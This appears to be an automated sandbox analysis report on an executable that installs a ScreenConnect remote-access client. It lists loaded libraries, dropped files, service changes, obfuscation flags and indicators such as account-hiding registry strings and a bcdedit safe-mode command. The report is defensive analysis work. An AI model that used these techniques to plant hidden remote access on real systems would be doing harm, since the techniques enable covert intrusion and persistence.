Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Section loaded: wkscli.dll	Jump to behavior

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

PE / OLE file has a valid certificate

Source: tmpzNIZ0YQ.exe

Static PE information: certificate valid

Submission file is bigger than most known malware samples

Source: tmpzNIZ0YQ.exe

Static file information: File size 5809048 > 1048576

PE file has a big raw section

Source: tmpzNIZ0YQ.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x537600

PE file contains a mix of data directories often seen in goodware

Source: tmpzNIZ0YQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: tmpzNIZ0YQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: tmpzNIZ0YQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: tmpzNIZ0YQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: tmpzNIZ0YQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: tmpzNIZ0YQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: tmpzNIZ0YQ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains a debug data directory

Source: tmpzNIZ0YQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544556921.0000000002962000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1543436866.0000000001050000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: tmpzNIZ0YQ.exe
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1477295453.000000000026D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: tmpzNIZ0YQ.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: tmpzNIZ0YQ.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: tmpzNIZ0YQ.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: tmpzNIZ0YQ.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: tmpzNIZ0YQ.exe, MSI934C.tmp.3.dr, 418a05.msi.3.dr, 418a03.msi.3.dr, 418a04.rbs.3.dr, MSI8E59.tmp.3.dr, MSI9148.tmp.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: tmpzNIZ0YQ.exe, MSI7FE2.tmp.2.dr, 418a05.msi.3.dr, 418a03.msi.3.dr, setup.msi.0.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1542649947.0000000001012000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544556921.0000000002962000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1543436866.0000000001050000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: tmpzNIZ0YQ.exe
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2677197803.0000000002BB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1552269904.0000000012A50000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: tmpzNIZ0YQ.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: tmpzNIZ0YQ.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr

PE file contains a valid data directory to section mapping

Source: tmpzNIZ0YQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: tmpzNIZ0YQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: tmpzNIZ0YQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: tmpzNIZ0YQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: tmpzNIZ0YQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.tmpzNIZ0YQ.exe.1c00000.0.raw.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.0.tmpzNIZ0YQ.exe.116bcf4.1.raw.unpack, Program.cs	.Net Code: Main System.Reflection.Assembly.Load(byte[])

PE file contains an invalid checksum

Source: tmpzNIZ0YQ.exe

Static PE information: real checksum: 0x550b20 should be: 0x58ce29

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_01B06F00 push eax; mov dword ptr [esp], ecx	0_2_01B06F11
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_01B01817 push esp; ret	0_2_01B01821
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_01B03E65 push edx; retf	0_2_01B03E75
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Code function: 0_2_05E03A78 pushad ; iretd	0_2_05E03AA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_3_049B77E3 push esp; ret	5_3_049B77E9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_3_049B29A0 push es; ret	5_3_049B29B0
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_01517738 push eax; iretd	8_2_01517739
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_04256B35 push esp; iretd	8_2_04256B39
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_04251DA8 push esp; retf	8_2_04251DB5
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FF886D62F40 pushfd ; iretd	9_2_00007FF886D62F41
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FF886D60F20 push edx; iretd	9_2_00007FF886D655DB
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FF886D65588 push edx; iretd	9_2_00007FF886D655DB
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FF886D6555A push edx; iretd	9_2_00007FF886D655DB

Persistence and Installation Behavior

Creates files in the system32 config directory

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe

File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Possible COM Object hijacking

Source: c:\program files (x86)\screenconnect client (20ae101cef0f1acf)\screenconnect.windowscredentialprovider.dll

COM Object registered for dropped file: hkey_local_machine\software\classes\clsid\{6ff59a85-bc37-4cd4-a44d-4392d823459f}\inprocserver32

Drops PE files

Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.InstallerActions.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9148.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.Cab.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI934C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.dll	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI9148.tmp			Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI934C.tmp			Jump to dropped file

May use bcdedit to modify the Windows boot settings

Source: ScreenConnect.ClientService.dll.3.dr

Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}

Boot Survival

Creates or modifies windows services

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application

Modifies existing windows services

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (20ae101cef0f1acf)

Contains functionality to hide user accounts

Hooking and other Techniques for Hiding and Protection

Source: tmpzNIZ0YQ.exe, 00000000.00000002.1417006147.0000000005BF0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: tmpzNIZ0YQ.exe, 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: rundll32.exe, 00000005.00000003.1442482197.00000000048D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1557814236.000000001B852000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544556921.0000000002962000.00000002.00000001.01000000.0000000D.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1543436866.0000000001050000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
Source: tmpzNIZ0YQ.exe	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.Windows.dll.5.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.Windows.dll.3.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: ScreenConnect.ClientService.dll.3.dr	String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe

Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
